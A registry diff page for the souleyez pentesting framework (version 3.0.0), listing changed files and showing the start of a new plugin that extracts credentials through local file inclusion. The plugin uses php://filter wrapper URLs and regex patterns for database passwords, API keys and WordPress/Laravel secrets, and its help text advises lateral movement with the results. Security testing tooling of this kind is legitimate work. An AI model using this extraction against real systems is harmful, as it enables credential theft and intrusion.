souleyez 2.43.29__py3-none-any.whl → 3.0.0__py3-none-any.whl
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of souleyez might be problematic. Click here for more details.
- souleyez/__init__.py +1 -2
- souleyez/ai/__init__.py +21 -15
- souleyez/ai/action_mapper.py +249 -150
- souleyez/ai/chain_advisor.py +116 -100
- souleyez/ai/claude_provider.py +29 -28
- souleyez/ai/context_builder.py +80 -62
- souleyez/ai/executor.py +158 -117
- souleyez/ai/feedback_handler.py +136 -121
- souleyez/ai/llm_factory.py +27 -20
- souleyez/ai/llm_provider.py +4 -2
- souleyez/ai/ollama_provider.py +6 -9
- souleyez/ai/ollama_service.py +44 -37
- souleyez/ai/path_scorer.py +91 -76
- souleyez/ai/recommender.py +176 -144
- souleyez/ai/report_context.py +74 -73
- souleyez/ai/report_service.py +84 -66
- souleyez/ai/result_parser.py +222 -229
- souleyez/ai/safety.py +67 -44
- souleyez/auth/__init__.py +23 -22
- souleyez/auth/audit.py +36 -26
- souleyez/auth/engagement_access.py +65 -48
- souleyez/auth/permissions.py +14 -3
- souleyez/auth/session_manager.py +54 -37
- souleyez/auth/user_manager.py +109 -64
- souleyez/commands/audit.py +40 -43
- souleyez/commands/auth.py +35 -15
- souleyez/commands/deliverables.py +55 -50
- souleyez/commands/engagement.py +47 -28
- souleyez/commands/license.py +32 -23
- souleyez/commands/screenshots.py +36 -32
- souleyez/commands/user.py +82 -36
- souleyez/config.py +52 -44
- souleyez/core/credential_tester.py +87 -81
- souleyez/core/cve_mappings.py +179 -192
- souleyez/core/cve_matcher.py +162 -148
- souleyez/core/msf_auto_mapper.py +100 -83
- souleyez/core/msf_chain_engine.py +294 -256
- souleyez/core/msf_database.py +153 -70
- souleyez/core/msf_integration.py +679 -673
- souleyez/core/msf_rpc_client.py +40 -42
- souleyez/core/msf_rpc_manager.py +77 -79
- souleyez/core/msf_sync_manager.py +241 -181
- souleyez/core/network_utils.py +22 -15
- souleyez/core/parser_handler.py +34 -25
- souleyez/core/pending_chains.py +114 -63
- souleyez/core/templates.py +158 -107
- souleyez/core/tool_chaining.py +9564 -2881
- souleyez/core/version_utils.py +79 -94
- souleyez/core/vuln_correlation.py +136 -89
- souleyez/core/web_utils.py +33 -32
- souleyez/data/wordlists/ad_users.txt +378 -0
- souleyez/data/wordlists/api_endpoints_large.txt +769 -0
- souleyez/data/wordlists/home_dir_sensitive.txt +39 -0
- souleyez/data/wordlists/lfi_payloads.txt +82 -0
- souleyez/data/wordlists/passwords_brute.txt +1548 -0
- souleyez/data/wordlists/passwords_crack.txt +2479 -0
- souleyez/data/wordlists/passwords_spray.txt +386 -0
- souleyez/data/wordlists/subdomains_large.txt +5057 -0
- souleyez/data/wordlists/usernames_common.txt +694 -0
- souleyez/data/wordlists/web_dirs_large.txt +4769 -0
- souleyez/detection/__init__.py +1 -1
- souleyez/detection/attack_signatures.py +12 -17
- souleyez/detection/mitre_mappings.py +61 -55
- souleyez/detection/validator.py +97 -86
- souleyez/devtools.py +23 -10
- souleyez/docs/README.md +4 -4
- souleyez/docs/api-reference/cli-commands.md +2 -2
- souleyez/docs/developer-guide/adding-new-tools.md +562 -0
- souleyez/docs/user-guide/auto-chaining.md +30 -8
- souleyez/docs/user-guide/getting-started.md +1 -1
- souleyez/docs/user-guide/installation.md +26 -3
- souleyez/docs/user-guide/metasploit-integration.md +2 -2
- souleyez/docs/user-guide/rbac.md +1 -1
- souleyez/docs/user-guide/scope-management.md +1 -1
- souleyez/docs/user-guide/siem-integration.md +1 -1
- souleyez/docs/user-guide/tools-reference.md +1 -8
- souleyez/docs/user-guide/worker-management.md +1 -1
- souleyez/engine/background.py +1239 -535
- souleyez/engine/base.py +4 -1
- souleyez/engine/job_status.py +17 -49
- souleyez/engine/log_sanitizer.py +103 -77
- souleyez/engine/manager.py +38 -7
- souleyez/engine/result_handler.py +2200 -1550
- souleyez/engine/worker_manager.py +50 -41
- souleyez/export/evidence_bundle.py +72 -62
- souleyez/feature_flags/features.py +16 -20
- souleyez/feature_flags.py +5 -9
- souleyez/handlers/__init__.py +11 -0
- souleyez/handlers/base.py +188 -0
- souleyez/handlers/bash_handler.py +277 -0
- souleyez/handlers/bloodhound_handler.py +243 -0
- souleyez/handlers/certipy_handler.py +311 -0
- souleyez/handlers/crackmapexec_handler.py +486 -0
- souleyez/handlers/dnsrecon_handler.py +344 -0
- souleyez/handlers/enum4linux_handler.py +400 -0
- souleyez/handlers/evil_winrm_handler.py +493 -0
- souleyez/handlers/ffuf_handler.py +815 -0
- souleyez/handlers/gobuster_handler.py +1114 -0
- souleyez/handlers/gpp_extract_handler.py +334 -0
- souleyez/handlers/hashcat_handler.py +444 -0
- souleyez/handlers/hydra_handler.py +564 -0
- souleyez/handlers/impacket_getuserspns_handler.py +343 -0
- souleyez/handlers/impacket_psexec_handler.py +222 -0
- souleyez/handlers/impacket_secretsdump_handler.py +426 -0
- souleyez/handlers/john_handler.py +286 -0
- souleyez/handlers/katana_handler.py +425 -0
- souleyez/handlers/kerbrute_handler.py +298 -0
- souleyez/handlers/ldapsearch_handler.py +636 -0
- souleyez/handlers/lfi_extract_handler.py +464 -0
- souleyez/handlers/msf_auxiliary_handler.py +409 -0
- souleyez/handlers/msf_exploit_handler.py +380 -0
- souleyez/handlers/nikto_handler.py +413 -0
- souleyez/handlers/nmap_handler.py +821 -0
- souleyez/handlers/nuclei_handler.py +359 -0
- souleyez/handlers/nxc_handler.py +417 -0
- souleyez/handlers/rdp_sec_check_handler.py +353 -0
- souleyez/handlers/registry.py +292 -0
- souleyez/handlers/responder_handler.py +232 -0
- souleyez/handlers/service_explorer_handler.py +434 -0
- souleyez/handlers/smbclient_handler.py +344 -0
- souleyez/handlers/smbmap_handler.py +510 -0
- souleyez/handlers/smbpasswd_handler.py +296 -0
- souleyez/handlers/sqlmap_handler.py +1116 -0
- souleyez/handlers/theharvester_handler.py +601 -0
- souleyez/handlers/web_login_test_handler.py +327 -0
- souleyez/handlers/whois_handler.py +277 -0
- souleyez/handlers/wpscan_handler.py +554 -0
- souleyez/history.py +32 -16
- souleyez/importers/msf_importer.py +106 -75
- souleyez/importers/smart_importer.py +208 -147
- souleyez/integrations/siem/__init__.py +10 -10
- souleyez/integrations/siem/base.py +17 -18
- souleyez/integrations/siem/elastic.py +108 -122
- souleyez/integrations/siem/factory.py +207 -80
- souleyez/integrations/siem/googlesecops.py +146 -154
- souleyez/integrations/siem/rule_mappings/__init__.py +1 -1
- souleyez/integrations/siem/rule_mappings/wazuh_rules.py +8 -5
- souleyez/integrations/siem/sentinel.py +107 -109
- souleyez/integrations/siem/splunk.py +246 -212
- souleyez/integrations/siem/wazuh.py +65 -71
- souleyez/integrations/wazuh/__init__.py +5 -5
- souleyez/integrations/wazuh/client.py +70 -93
- souleyez/integrations/wazuh/config.py +85 -57
- souleyez/integrations/wazuh/host_mapper.py +28 -36
- souleyez/integrations/wazuh/sync.py +78 -68
- souleyez/intelligence/__init__.py +4 -5
- souleyez/intelligence/correlation_analyzer.py +309 -295
- souleyez/intelligence/exploit_knowledge.py +661 -623
- souleyez/intelligence/exploit_suggestions.py +159 -139
- souleyez/intelligence/gap_analyzer.py +132 -97
- souleyez/intelligence/gap_detector.py +251 -214
- souleyez/intelligence/sensitive_tables.py +266 -129
- souleyez/intelligence/service_parser.py +137 -123
- souleyez/intelligence/surface_analyzer.py +407 -268
- souleyez/intelligence/target_parser.py +159 -162
- souleyez/licensing/__init__.py +6 -6
- souleyez/licensing/validator.py +17 -19
- souleyez/log_config.py +79 -54
- souleyez/main.py +1505 -687
- souleyez/migrations/fix_job_counter.py +16 -14
- souleyez/parsers/bloodhound_parser.py +41 -39
- souleyez/parsers/crackmapexec_parser.py +178 -111
- souleyez/parsers/dalfox_parser.py +72 -77
- souleyez/parsers/dnsrecon_parser.py +103 -91
- souleyez/parsers/enum4linux_parser.py +183 -153
- souleyez/parsers/ffuf_parser.py +29 -25
- souleyez/parsers/gobuster_parser.py +301 -41
- souleyez/parsers/hashcat_parser.py +324 -79
- souleyez/parsers/http_fingerprint_parser.py +350 -103
- souleyez/parsers/hydra_parser.py +131 -111
- souleyez/parsers/impacket_parser.py +231 -178
- souleyez/parsers/john_parser.py +98 -86
- souleyez/parsers/katana_parser.py +316 -0
- souleyez/parsers/msf_parser.py +943 -498
- souleyez/parsers/nikto_parser.py +346 -65
- souleyez/parsers/nmap_parser.py +262 -174
- souleyez/parsers/nuclei_parser.py +40 -44
- souleyez/parsers/responder_parser.py +26 -26
- souleyez/parsers/searchsploit_parser.py +74 -74
- souleyez/parsers/service_explorer_parser.py +279 -0
- souleyez/parsers/smbmap_parser.py +180 -124
- souleyez/parsers/sqlmap_parser.py +434 -308
- souleyez/parsers/theharvester_parser.py +75 -57
- souleyez/parsers/whois_parser.py +135 -94
- souleyez/parsers/wpscan_parser.py +278 -190
- souleyez/plugins/afp.py +44 -36
- souleyez/plugins/afp_brute.py +114 -46
- souleyez/plugins/ard.py +48 -37
- souleyez/plugins/bloodhound.py +95 -61
- souleyez/plugins/certipy.py +303 -0
- souleyez/plugins/crackmapexec.py +186 -85
- souleyez/plugins/dalfox.py +120 -59
- souleyez/plugins/dns_hijack.py +146 -41
- souleyez/plugins/dnsrecon.py +97 -61
- souleyez/plugins/enum4linux.py +91 -66
- souleyez/plugins/evil_winrm.py +291 -0
- souleyez/plugins/ffuf.py +166 -90
- souleyez/plugins/firmware_extract.py +133 -29
- souleyez/plugins/gobuster.py +387 -190
- souleyez/plugins/gpp_extract.py +393 -0
- souleyez/plugins/hashcat.py +100 -73
- souleyez/plugins/http_fingerprint.py +913 -267
- souleyez/plugins/hydra.py +566 -200
- souleyez/plugins/impacket_getnpusers.py +117 -69
- souleyez/plugins/impacket_psexec.py +84 -64
- souleyez/plugins/impacket_secretsdump.py +103 -69
- souleyez/plugins/impacket_smbclient.py +89 -75
- souleyez/plugins/john.py +86 -69
- souleyez/plugins/katana.py +313 -0
- souleyez/plugins/kerbrute.py +237 -0
- souleyez/plugins/lfi_extract.py +541 -0
- souleyez/plugins/macos_ssh.py +117 -48
- souleyez/plugins/mdns.py +35 -30
- souleyez/plugins/msf_auxiliary.py +253 -130
- souleyez/plugins/msf_exploit.py +239 -161
- souleyez/plugins/nikto.py +134 -78
- souleyez/plugins/nmap.py +275 -91
- souleyez/plugins/nuclei.py +180 -89
- souleyez/plugins/nxc.py +285 -0
- souleyez/plugins/plugin_base.py +35 -36
- souleyez/plugins/plugin_template.py +13 -5
- souleyez/plugins/rdp_sec_check.py +130 -0
- souleyez/plugins/responder.py +112 -71
- souleyez/plugins/router_http_brute.py +76 -65
- souleyez/plugins/router_ssh_brute.py +118 -41
- souleyez/plugins/router_telnet_brute.py +124 -42
- souleyez/plugins/routersploit.py +91 -59
- souleyez/plugins/routersploit_exploit.py +77 -55
- souleyez/plugins/searchsploit.py +91 -77
- souleyez/plugins/service_explorer.py +1160 -0
- souleyez/plugins/smbmap.py +122 -72
- souleyez/plugins/smbpasswd.py +215 -0
- souleyez/plugins/sqlmap.py +301 -113
- souleyez/plugins/theharvester.py +127 -75
- souleyez/plugins/tr069.py +79 -57
- souleyez/plugins/upnp.py +65 -47
- souleyez/plugins/upnp_abuse.py +73 -55
- souleyez/plugins/vnc_access.py +129 -42
- souleyez/plugins/vnc_brute.py +109 -38
- souleyez/plugins/web_login_test.py +417 -0
- souleyez/plugins/whois.py +77 -58
- souleyez/plugins/wpscan.py +219 -69
- souleyez/reporting/__init__.py +2 -1
- souleyez/reporting/attack_chain.py +411 -346
- souleyez/reporting/charts.py +436 -501
- souleyez/reporting/compliance_mappings.py +334 -201
- souleyez/reporting/detection_report.py +126 -125
- souleyez/reporting/formatters.py +828 -591
- souleyez/reporting/generator.py +386 -302
- souleyez/reporting/metrics.py +72 -75
- souleyez/scanner.py +35 -29
- souleyez/security/__init__.py +37 -11
- souleyez/security/scope_validator.py +175 -106
- souleyez/security/validation.py +237 -149
- souleyez/security.py +22 -6
- souleyez/storage/credentials.py +247 -186
- souleyez/storage/crypto.py +296 -129
- souleyez/storage/database.py +73 -50
- souleyez/storage/db.py +58 -36
- souleyez/storage/deliverable_evidence.py +177 -128
- souleyez/storage/deliverable_exporter.py +282 -246
- souleyez/storage/deliverable_templates.py +134 -116
- souleyez/storage/deliverables.py +135 -130
- souleyez/storage/engagements.py +109 -56
- souleyez/storage/evidence.py +181 -152
- souleyez/storage/execution_log.py +31 -17
- souleyez/storage/exploit_attempts.py +93 -57
- souleyez/storage/exploits.py +67 -36
- souleyez/storage/findings.py +48 -61
- souleyez/storage/hosts.py +176 -144
- souleyez/storage/migrate_to_engagements.py +43 -19
- souleyez/storage/migrations/_001_add_credential_enhancements.py +22 -12
- souleyez/storage/migrations/_002_add_status_tracking.py +10 -7
- souleyez/storage/migrations/_003_add_execution_log.py +14 -8
- souleyez/storage/migrations/_005_screenshots.py +13 -5
- souleyez/storage/migrations/_006_deliverables.py +13 -5
- souleyez/storage/migrations/_007_deliverable_templates.py +12 -7
- souleyez/storage/migrations/_008_add_nuclei_table.py +10 -4
- souleyez/storage/migrations/_010_evidence_linking.py +17 -10
- souleyez/storage/migrations/_011_timeline_tracking.py +20 -13
- souleyez/storage/migrations/_012_team_collaboration.py +34 -21
- souleyez/storage/migrations/_013_add_host_tags.py +12 -6
- souleyez/storage/migrations/_014_exploit_attempts.py +22 -10
- souleyez/storage/migrations/_015_add_mac_os_fields.py +15 -7
- souleyez/storage/migrations/_016_add_domain_field.py +10 -4
- souleyez/storage/migrations/_017_msf_sessions.py +16 -8
- souleyez/storage/migrations/_018_add_osint_target.py +10 -6
- souleyez/storage/migrations/_019_add_engagement_type.py +10 -6
- souleyez/storage/migrations/_020_add_rbac.py +36 -15
- souleyez/storage/migrations/_021_wazuh_integration.py +20 -8
- souleyez/storage/migrations/_022_wazuh_indexer_columns.py +6 -4
- souleyez/storage/migrations/_023_fix_detection_results_fk.py +16 -6
- souleyez/storage/migrations/_024_wazuh_vulnerabilities.py +26 -10
- souleyez/storage/migrations/_025_multi_siem_support.py +3 -5
- souleyez/storage/migrations/_026_add_engagement_scope.py +31 -12
- souleyez/storage/migrations/_027_multi_siem_persistence.py +32 -15
- souleyez/storage/migrations/__init__.py +26 -26
- souleyez/storage/migrations/migration_manager.py +19 -19
- souleyez/storage/msf_sessions.py +100 -65
- souleyez/storage/osint.py +17 -24
- souleyez/storage/recommendation_engine.py +269 -235
- souleyez/storage/screenshots.py +33 -32
- souleyez/storage/smb_shares.py +136 -92
- souleyez/storage/sqlmap_data.py +183 -128
- souleyez/storage/team_collaboration.py +135 -141
- souleyez/storage/timeline_tracker.py +122 -94
- souleyez/storage/wazuh_vulns.py +64 -66
- souleyez/storage/web_paths.py +33 -37
- souleyez/testing/credential_tester.py +221 -205
- souleyez/ui/__init__.py +1 -1
- souleyez/ui/ai_quotes.py +12 -12
- souleyez/ui/attack_surface.py +2439 -1516
- souleyez/ui/chain_rules_view.py +914 -382
- souleyez/ui/correlation_view.py +312 -230
- souleyez/ui/dashboard.py +2382 -1130
- souleyez/ui/deliverables_view.py +148 -62
- souleyez/ui/design_system.py +13 -13
- souleyez/ui/errors.py +49 -49
- souleyez/ui/evidence_linking_view.py +284 -179
- souleyez/ui/evidence_vault.py +393 -285
- souleyez/ui/exploit_suggestions_view.py +555 -349
- souleyez/ui/export_view.py +100 -66
- souleyez/ui/gap_analysis_view.py +315 -171
- souleyez/ui/help_system.py +105 -97
- souleyez/ui/intelligence_view.py +436 -293
- souleyez/ui/interactive.py +23034 -10679
- souleyez/ui/interactive_selector.py +75 -68
- souleyez/ui/log_formatter.py +47 -39
- souleyez/ui/menu_components.py +22 -13
- souleyez/ui/msf_auxiliary_menu.py +184 -133
- souleyez/ui/pending_chains_view.py +336 -172
- souleyez/ui/progress_indicators.py +5 -3
- souleyez/ui/recommendations_view.py +195 -137
- souleyez/ui/rule_builder.py +343 -225
- souleyez/ui/setup_wizard.py +678 -284
- souleyez/ui/shortcuts.py +217 -165
- souleyez/ui/splunk_gap_analysis_view.py +452 -270
- souleyez/ui/splunk_vulns_view.py +139 -86
- souleyez/ui/team_dashboard.py +498 -335
- souleyez/ui/template_selector.py +196 -105
- souleyez/ui/terminal.py +6 -6
- souleyez/ui/timeline_view.py +198 -127
- souleyez/ui/tool_setup.py +264 -164
- souleyez/ui/tutorial.py +202 -72
- souleyez/ui/tutorial_state.py +40 -40
- souleyez/ui/wazuh_vulns_view.py +235 -141
- souleyez/ui/wordlist_browser.py +260 -107
- souleyez/ui.py +464 -312
- souleyez/utils/tool_checker.py +427 -367
- souleyez/utils.py +33 -29
- souleyez/wordlists.py +134 -167
- {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/METADATA +2 -2
- souleyez-3.0.0.dist-info/RECORD +443 -0
- {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/WHEEL +1 -1
- souleyez-2.43.29.dist-info/RECORD +0 -379
- {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/entry_points.txt +0 -0
- {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/licenses/LICENSE +0 -0
- {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/top_level.txt +0 -0
|
@@ -0,0 +1,541 @@
|
|
|
1
|
+
#!/usr/bin/env python3
|
|
2
|
+
"""
|
|
3
|
+
souleyez.plugins.lfi_extract - Extract credentials from LFI vulnerabilities
|
|
4
|
+
|
|
5
|
+
A custom SoulEyez tool that:
|
|
6
|
+
1. Takes PHP filter wrapper URLs discovered by FFUF LFI scans
|
|
7
|
+
2. Fetches the base64-encoded source code
|
|
8
|
+
3. Decodes and parses for credentials (database passwords, API keys, etc.)
|
|
9
|
+
4. Stores extracted credentials in the credentials table
|
|
10
|
+
|
|
11
|
+
This is "glue" tooling - it bridges the gap between LFI discovery and
|
|
12
|
+
credential exploitation.
|
|
13
|
+
"""
|
|
14
|
+
import base64
|
|
15
|
+
import json
|
|
16
|
+
import re
|
|
17
|
+
import time
|
|
18
|
+
import warnings
|
|
19
|
+
from typing import Any, Dict, List, Optional
|
|
20
|
+
from urllib.parse import urlparse
|
|
21
|
+
|
|
22
|
+
from .plugin_base import PluginBase
|
|
23
|
+
|
|
24
|
+
# Suppress SSL warnings for pentesting
|
|
25
|
+
warnings.filterwarnings("ignore", message="Unverified HTTPS request")
|
|
26
|
+
|
|
27
|
+
HELP = {
|
|
28
|
+
"name": "LFI Extract - Credential Extraction from LFI",
|
|
29
|
+
"description": (
|
|
30
|
+
"Extracts credentials from Local File Inclusion (LFI) vulnerabilities.\n\n"
|
|
31
|
+
"When PHP filter wrapper URLs are discovered (e.g., via FFUF LFI scan), "
|
|
32
|
+
"this tool fetches the base64-encoded source code, decodes it, and "
|
|
33
|
+
"parses for credentials.\n\n"
|
|
34
|
+
"Supported extraction:\n"
|
|
35
|
+
"- Database credentials (MySQL, PostgreSQL, etc.)\n"
|
|
36
|
+
"- API keys and tokens\n"
|
|
37
|
+
"- Configuration secrets\n"
|
|
38
|
+
"- WordPress wp-config.php credentials\n"
|
|
39
|
+
"- Laravel .env files\n"
|
|
40
|
+
),
|
|
41
|
+
"usage": "souleyez jobs enqueue lfi_extract <url>",
|
|
42
|
+
"examples": [
|
|
43
|
+
"souleyez jobs enqueue lfi_extract 'http://target/?page=php://filter/convert.base64-encode/resource=config'",
|
|
44
|
+
"souleyez jobs enqueue lfi_extract --urls-file /tmp/lfi_urls.txt",
|
|
45
|
+
],
|
|
46
|
+
"flags": [
|
|
47
|
+
["--timeout <sec>", "Request timeout per URL (default: 10)"],
|
|
48
|
+
["--urls-file <path>", "File containing URLs to extract (one per line)"],
|
|
49
|
+
["--max-urls <n>", "Maximum URLs to process (default: 20)"],
|
|
50
|
+
],
|
|
51
|
+
"presets": [
|
|
52
|
+
{"name": "Quick Extract", "args": [], "desc": "Extract from single URL"},
|
|
53
|
+
{
|
|
54
|
+
"name": "Batch Extract",
|
|
55
|
+
"args": ["--max-urls", "50"],
|
|
56
|
+
"desc": "Process up to 50 URLs",
|
|
57
|
+
},
|
|
58
|
+
],
|
|
59
|
+
"help_sections": [
|
|
60
|
+
{
|
|
61
|
+
"title": "What is LFI Credential Extraction?",
|
|
62
|
+
"color": "cyan",
|
|
63
|
+
"content": [
|
|
64
|
+
(
|
|
65
|
+
"Overview",
|
|
66
|
+
[
|
|
67
|
+
"Extracts credentials from Local File Inclusion (LFI) vulnerabilities",
|
|
68
|
+
"Uses PHP filter wrappers to read source code as base64",
|
|
69
|
+
"Parses decoded content for database passwords, API keys, etc.",
|
|
70
|
+
],
|
|
71
|
+
),
|
|
72
|
+
(
|
|
73
|
+
"How LFI Works",
|
|
74
|
+
[
|
|
75
|
+
"LFI allows reading local files through web parameters",
|
|
76
|
+
"php://filter/convert.base64-encode bypasses PHP execution",
|
|
77
|
+
"Returns raw source code instead of executed output",
|
|
78
|
+
"Source code often contains hardcoded credentials",
|
|
79
|
+
],
|
|
80
|
+
),
|
|
81
|
+
],
|
|
82
|
+
},
|
|
83
|
+
{
|
|
84
|
+
"title": "Usage & Examples",
|
|
85
|
+
"color": "green",
|
|
86
|
+
"content": [
|
|
87
|
+
(
|
|
88
|
+
"Single URL",
|
|
89
|
+
[
|
|
90
|
+
"souleyez jobs enqueue lfi_extract 'http://target/?page=php://filter/convert.base64-encode/resource=config'",
|
|
91
|
+
" → Fetches and decodes the config file",
|
|
92
|
+
],
|
|
93
|
+
),
|
|
94
|
+
(
|
|
95
|
+
"From FFUF Results",
|
|
96
|
+
[
|
|
97
|
+
"FFUF LFI scan finds vulnerable parameters",
|
|
98
|
+
"Auto-chain triggers lfi_extract on discovered URLs",
|
|
99
|
+
"Credentials automatically stored in database",
|
|
100
|
+
],
|
|
101
|
+
),
|
|
102
|
+
],
|
|
103
|
+
},
|
|
104
|
+
{
|
|
105
|
+
"title": "What Gets Extracted",
|
|
106
|
+
"color": "yellow",
|
|
107
|
+
"content": [
|
|
108
|
+
(
|
|
109
|
+
"Credential Types",
|
|
110
|
+
[
|
|
111
|
+
"Database credentials (MySQL, PostgreSQL, SQLite)",
|
|
112
|
+
"WordPress wp-config.php (DB_USER, DB_PASSWORD)",
|
|
113
|
+
"Laravel .env files (DB_*, APP_KEY, API tokens)",
|
|
114
|
+
"API keys and tokens in config files",
|
|
115
|
+
],
|
|
116
|
+
),
|
|
117
|
+
(
|
|
118
|
+
"Common Target Files",
|
|
119
|
+
[
|
|
120
|
+
"config.php, settings.php, database.php",
|
|
121
|
+
"wp-config.php (WordPress)",
|
|
122
|
+
".env (Laravel, Node.js)",
|
|
123
|
+
"includes/config.inc.php (many apps)",
|
|
124
|
+
],
|
|
125
|
+
),
|
|
126
|
+
],
|
|
127
|
+
},
|
|
128
|
+
{
|
|
129
|
+
"title": "After Extraction",
|
|
130
|
+
"color": "magenta",
|
|
131
|
+
"content": [
|
|
132
|
+
(
|
|
133
|
+
"Next Steps",
|
|
134
|
+
[
|
|
135
|
+
"Credentials stored in SoulEyez database automatically",
|
|
136
|
+
"Try database creds on MySQL/PostgreSQL ports (3306, 5432)",
|
|
137
|
+
"Use extracted creds for lateral movement",
|
|
138
|
+
"Check if same password used for admin panels",
|
|
139
|
+
],
|
|
140
|
+
),
|
|
141
|
+
],
|
|
142
|
+
},
|
|
143
|
+
],
|
|
144
|
+
}
|
|
145
|
+
|
|
146
|
+
# Credential patterns to search for in decoded PHP/config files
|
|
147
|
+
CREDENTIAL_PATTERNS = [
|
|
148
|
+
# PHP variable assignments
|
|
149
|
+
(r'\$(?:password|passwd|pass|pwd)\s*=\s*["\']([^"\']+)["\']', "password"),
|
|
150
|
+
(r'\$(?:username|user|usr|login|db_user)\s*=\s*["\']([^"\']+)["\']', "username"),
|
|
151
|
+
(r'\$(?:database|db|dbname|db_name)\s*=\s*["\']([^"\']+)["\']', "database"),
|
|
152
|
+
(r'\$(?:server|host|hostname|db_host)\s*=\s*["\']([^"\']+)["\']', "host"),
|
|
153
|
+
# Array-style configs
|
|
154
|
+
(r'["\']password["\']\s*=>\s*["\']([^"\']+)["\']', "password"),
|
|
155
|
+
(r'["\']username["\']\s*=>\s*["\']([^"\']+)["\']', "username"),
|
|
156
|
+
(r'["\']user["\']\s*=>\s*["\']([^"\']+)["\']', "username"),
|
|
157
|
+
(r'["\']database["\']\s*=>\s*["\']([^"\']+)["\']', "database"),
|
|
158
|
+
(r'["\']host["\']\s*=>\s*["\']([^"\']+)["\']', "host"),
|
|
159
|
+
# WordPress defines
|
|
160
|
+
(r"define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", "password"),
|
|
161
|
+
(r"define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", "username"),
|
|
162
|
+
(r"define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", "database"),
|
|
163
|
+
(r"define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", "host"),
|
|
164
|
+
# Laravel/dotenv style
|
|
165
|
+
(r'DB_PASSWORD\s*=\s*["\']?([^"\'\s\n]+)["\']?', "password"),
|
|
166
|
+
(r'DB_USERNAME\s*=\s*["\']?([^"\'\s\n]+)["\']?', "username"),
|
|
167
|
+
(r'DB_DATABASE\s*=\s*["\']?([^"\'\s\n]+)["\']?', "database"),
|
|
168
|
+
(r'DB_HOST\s*=\s*["\']?([^"\'\s\n]+)["\']?', "host"),
|
|
169
|
+
# API keys and tokens
|
|
170
|
+
(
|
|
171
|
+
r'(?:api_key|apikey|api_secret|secret_key)\s*[=:]\s*["\']?([A-Za-z0-9_\-]{20,})["\']?',
|
|
172
|
+
"api_key",
|
|
173
|
+
),
|
|
174
|
+
(
|
|
175
|
+
r'(?:AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)\s*[=:]\s*["\']([^"\']+)["\']',
|
|
176
|
+
"secret_key",
|
|
177
|
+
),
|
|
178
|
+
# Generic connection strings
|
|
179
|
+
(r"mysql://([^:]+):([^@]+)@([^/]+)/(\w+)", "connection_string"),
|
|
180
|
+
(r"postgresql://([^:]+):([^@]+)@([^/]+)/(\w+)", "connection_string"),
|
|
181
|
+
]
|
|
182
|
+
|
|
183
|
+
# Files that commonly contain credentials
|
|
184
|
+
HIGH_VALUE_FILES = [
|
|
185
|
+
"config.php",
|
|
186
|
+
"configuration.php",
|
|
187
|
+
"settings.php",
|
|
188
|
+
"database.php",
|
|
189
|
+
"db.php",
|
|
190
|
+
"connect.php",
|
|
191
|
+
"connection.php",
|
|
192
|
+
"conn.php",
|
|
193
|
+
"wp-config.php",
|
|
194
|
+
"config.inc.php",
|
|
195
|
+
"db.inc.php",
|
|
196
|
+
".env",
|
|
197
|
+
"env.php",
|
|
198
|
+
"environment.php",
|
|
199
|
+
]
|
|
200
|
+
|
|
201
|
+
|
|
202
|
+
class LfiExtractPlugin(PluginBase):
|
|
203
|
+
"""Custom SoulEyez tool for extracting credentials from LFI vulnerabilities."""
|
|
204
|
+
|
|
205
|
+
name = "LFI Extract"
|
|
206
|
+
tool = "lfi_extract"
|
|
207
|
+
category = "exploitation"
|
|
208
|
+
HELP = HELP
|
|
209
|
+
|
|
210
|
+
def build_command(
|
|
211
|
+
self, target: str, args: List[str] = None, label: str = "", log_path: str = None
|
|
212
|
+
):
|
|
213
|
+
"""
|
|
214
|
+
LFI extraction is done in Python, not via external command.
|
|
215
|
+
Return None to use run() method instead.
|
|
216
|
+
"""
|
|
217
|
+
return None
|
|
218
|
+
|
|
219
|
+
def check_tool_available(self) -> bool:
|
|
220
|
+
"""Built-in tool - always available."""
|
|
221
|
+
return True
|
|
222
|
+
|
|
223
|
+
def run(
|
|
224
|
+
self, target: str, args: List[str] = None, label: str = "", log_path: str = None
|
|
225
|
+
) -> int:
|
|
226
|
+
"""Execute LFI credential extraction."""
|
|
227
|
+
args = args or []
|
|
228
|
+
timeout = 10
|
|
229
|
+
max_urls = 20
|
|
230
|
+
urls_file = None
|
|
231
|
+
|
|
232
|
+
# Parse args
|
|
233
|
+
i = 0
|
|
234
|
+
while i < len(args):
|
|
235
|
+
if args[i] == "--timeout" and i + 1 < len(args):
|
|
236
|
+
try:
|
|
237
|
+
timeout = int(args[i + 1])
|
|
238
|
+
except ValueError:
|
|
239
|
+
pass
|
|
240
|
+
i += 2
|
|
241
|
+
elif args[i] == "--max-urls" and i + 1 < len(args):
|
|
242
|
+
try:
|
|
243
|
+
max_urls = int(args[i + 1])
|
|
244
|
+
except ValueError:
|
|
245
|
+
pass
|
|
246
|
+
i += 2
|
|
247
|
+
elif args[i] == "--urls-file" and i + 1 < len(args):
|
|
248
|
+
urls_file = args[i + 1]
|
|
249
|
+
i += 2
|
|
250
|
+
else:
|
|
251
|
+
i += 1
|
|
252
|
+
|
|
253
|
+
# Collect URLs to process
|
|
254
|
+
urls_to_process = []
|
|
255
|
+
|
|
256
|
+
# If urls_file provided, read from it
|
|
257
|
+
if urls_file:
|
|
258
|
+
try:
|
|
259
|
+
with open(urls_file, "r") as f:
|
|
260
|
+
for line in f:
|
|
261
|
+
line = line.strip()
|
|
262
|
+
if line and not line.startswith("#"):
|
|
263
|
+
urls_to_process.append(line)
|
|
264
|
+
except FileNotFoundError:
|
|
265
|
+
pass
|
|
266
|
+
|
|
267
|
+
# If target is a URL, add it
|
|
268
|
+
if target and target.startswith("http"):
|
|
269
|
+
urls_to_process.append(target)
|
|
270
|
+
|
|
271
|
+
